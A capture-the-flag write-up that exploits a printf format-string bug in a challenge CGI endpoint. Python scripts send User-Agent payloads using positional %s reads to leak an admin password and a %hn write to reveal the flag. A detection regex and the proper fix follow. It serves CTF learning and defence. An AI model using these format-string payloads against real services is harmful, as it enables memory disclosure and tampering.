First, use the printf format-string bug to leak the AdminPass; then use a printf %hn write to change "br" into "fl" and leak the flag.

Leak AdminPass:

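import requests

# Walk the positional printf arguments, reading each one as a string (%<i>$s).
for i in range(320, 5000):
    try:
        r = requests.post(
            "https://nessus-braggart.chals.io/sec.cgi",
            headers={"X-DEBUG": "1", "User-Agent": "A" * 1008 + f"%{i}$s"},
            timeout=5,
        )

        # The formatted User-Agent is echoed between these two markers.
        d = r.text.split("User Agent : </h3>")[1].split("</pre>")[0]
        # d = bytes.fromhex(d[2:])[::-1]
        print(i, d)

    except (requests.RequestException, IndexError):
        # Request failed or the marker is missing from the response; try the next index.
        pass

# AdminPass=xbYP3h7Ua94c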

Leak Flag:

import requests

# %27750x pads the output count to 27750 (0x6c66, i.e. "fl" as a little-endian
# 16-bit value); %267$hn writes that count through argument 267; %267$s then
# prints the string at that same argument.
r = requests.post(
    "https://nessus-braggart.chals.io/sec.cgi",
    headers={
        "X-DEBUG": "1",
        "X-PASSWORD": "xbYP3h7Ua94c",
        "User-Agent": "A" * 1008 + "%27750x" + "%267$hn" + "%267$s",
    },
    timeout=5,
)
d = r.text.split("User Agent : </h3>")[1].split("</pre>")[0]
print(d)
print(r.text)
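
A defensive counterpart to the two requests above, as an added example that is not part of the original writeup: a check that flags header values carrying printf conversion directives of the kind used here (positional arguments, %n-family writes, very large field widths). The function name, the width threshold and the sample values are assumptions made for illustration.

```python
import re

# One printf conversion: %[pos$][flags][width][.prec][length]conv
DIRECTIVE = re.compile(
    r"%(?:(?P<pos>\d+)\$)?(?P<flags>[-+ #0']*)(?P<width>\d+|\*)?"
    r"(?:\.(?P<prec>\d+|\*))?(?P<length>hh|h|ll|l|j|z|t|L)?"
    r"(?P<conv>[diouxXeEfFgGaAcspn])"
)

WIDTH_LIMIT = 1024  # assumed threshold: widths this large serve to set the output count


def classify_header(value: str) -> set[str]:
    """Return the format-string indicators found in one header value."""
    findings = set()
    # A literal "%%" prints a percent sign and is not a directive, so drop it first.
    for m in DIRECTIVE.finditer(value.replace("%%", "")):
        if m["pos"]:
            findings.add("positional-argument")  # %N$... selects an arbitrary argument
        if m["conv"] == "n":
            findings.add("memory-write")  # %n, %hn, %hhn store the output count
        if m["width"] and m["width"] != "*" and int(m["width"]) > WIDTH_LIMIT:
            findings.add("large-width")
    # A bare %s or %d is deliberately not reported: URL-encoded text such as
    # "%20s" would collide with it and produce false positives.
    return findings


# Constructed header values, shaped like the requests in this writeup.
SAMPLES = {
    "browser": "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0",
    "leak": "A" * 1008 + "%320$s",
    "write": "A" * 1008 + "%27750x" + "%267$hn" + "%267$s",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, sorted(classify_header(value)))
```

A filter like this is a compensating control for logging and alerting; the fix for a printf format-string bug is to call printf with a constant format string and pass the header as an argument.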

The full walkthrough can be found in the video: https://youtu.be/g0mVAbZUXqM?t=1139

Original writeup (https://youtu.be/g0mVAbZUXqM?t=1139).